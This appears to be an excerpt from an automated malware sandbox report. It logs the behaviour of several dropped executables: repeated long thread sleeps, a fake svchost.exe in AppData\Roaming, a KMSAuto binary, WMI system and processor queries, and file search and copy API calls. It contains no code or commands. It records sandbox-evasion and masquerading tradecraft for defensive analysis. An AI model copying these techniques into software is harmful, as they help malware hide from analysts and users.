Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -561297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -561078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -560860s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -560656s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -560469s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -560282s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -560032s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -559828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -559632s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -559419s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -559235s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -558907s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -558657s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -558469s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -558266s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -558016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -557837s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -557608s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -557391s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -557141s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -556907s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -556500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -556297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -556094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -555797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -555563s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -555364s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -555172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -554974s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -554789s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -554610s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -554382s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -553953s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -553691s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -553422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -553199s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -552938s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -552735s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -552531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -552282s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -551735s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -551485s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -551281s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -551063s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -550858s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -550703s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -550484s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -550172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -549969s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -549610s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -549141s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -548906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -548703s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -548469s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -548266s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -547938s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -547735s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -547422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -546906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -546594s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -546266s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -545969s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -545500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -545188s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -544500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -544198s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -543828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7356	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7264	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe TID: 7436	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe TID: 7528	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe TID: 7644	Thread sleep time: -55000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe TID: 8084	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe TID: 7688	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 8068	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 8076	Thread sleep count: 1947 > 30
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 8068	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6616	Thread sleep count: 299 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5516	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6892	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\KMSAuto\accc.exe TID: 6992	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -599719s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -599265s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -598734s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -598453s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -598255s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -598000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -597781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -597590s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -597344s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -597170s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -596906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -596765s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -596219s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -596062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -595875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -595656s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -595490s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -595265s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -595047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -594828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -594633s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -594437s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -594250s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -593875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -593594s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -593359s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -593047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -592797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -592562s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -592344s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -592140s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -591797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -591344s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -591062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -590828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -590640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -590406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -590140s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -589922s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -589724s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -589599s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -589156s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -588984s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -588765s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -588578s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -588390s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -588226s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -588062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -587873s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -587640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -587422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -587265s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -586890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -586594s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -586375s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -586109s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -585781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -585422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -585156s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -584812s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -584276s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -583949s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -583728s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -583515s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -583234s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -583062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -582812s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -582578s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -582297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -581890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -581703s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -581469s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -581312s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -581094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -580906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -580716s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -580531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -580312s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -580015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -579609s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -579437s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -579276s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -579078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -578931s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -578703s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -578538s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -578328s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -578125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -577953s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -577791s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -577500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -577187s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -577015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -576856s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -576665s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -576515s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -576297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -576015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -575844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -575656s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -575523s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -575359s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -574969s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -574750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -574453s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -574181s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -573781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -573469s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -573219s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -572828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -572390s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -572203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -572001s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -571797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -571500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -571297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -571047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -570859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -570713s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -570539s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -570156s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -569982s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -569812s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976	Thread sleep time: -569646s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\svchost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\KMSAuto\accc.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A187F1C FindFirstFileW,CopyFileW,RegOpenKeyExW,SetFileAttributesW,FindNextFileW,FindClose,	0_2_00007FF68A187F1C
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A184F64 SHGetFolderPathW,FindFirstFileW,FindNextFileW,	0_2_00007FF68A184F64
Source: C:\Windows\explorer.exe	Code function: 2_2_0F3C6350 lstrcpy,lstrcatA,CreateDirectoryA,GetLastError,FindFirstFileA,lstrcpy,lstrcatA,lstrcatA,lstrcpy,lstrcatA,lstrcatA,lstrcmp,lstrcmp,CreateDirectoryA,GetLastError,CopyFileA,FindNextFileA,	2_2_0F3C6350
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA334F64 SHGetFolderPathW,FindFirstFileW,FindNextFileW,	47_2_00007FF6AA334F64
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA337F1C FindFirstFileW,CopyFileW,RegOpenKeyExW,SetFileAttributesW,FindNextFileW,FindClose,	47_2_00007FF6AA337F1C
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B07F1C FindFirstFileW,CopyFileW,RegOpenKeyExW,SetFileAttributesW,FindNextFileW,FindClose,	52_2_00007FF7C9B07F1C
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B04F64 SHGetFolderPathW,FindFirstFileW,FindNextFileW,	52_2_00007FF7C9B04F64
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE484F64 SHGetFolderPathW,FindFirstFileW,FindNextFileW,	53_2_00007FF7AE484F64
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE487F1C FindFirstFileW,CopyFileW,RegOpenKeyExW,SetFileAttributesW,FindNextFileW,FindClose,	53_2_00007FF7AE487F1C
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07C7F1C FindFirstFileW,CopyFileW,RegOpenKeyExW,SetFileAttributesW,FindNextFileW,FindClose,	55_2_00007FF7C07C7F1C
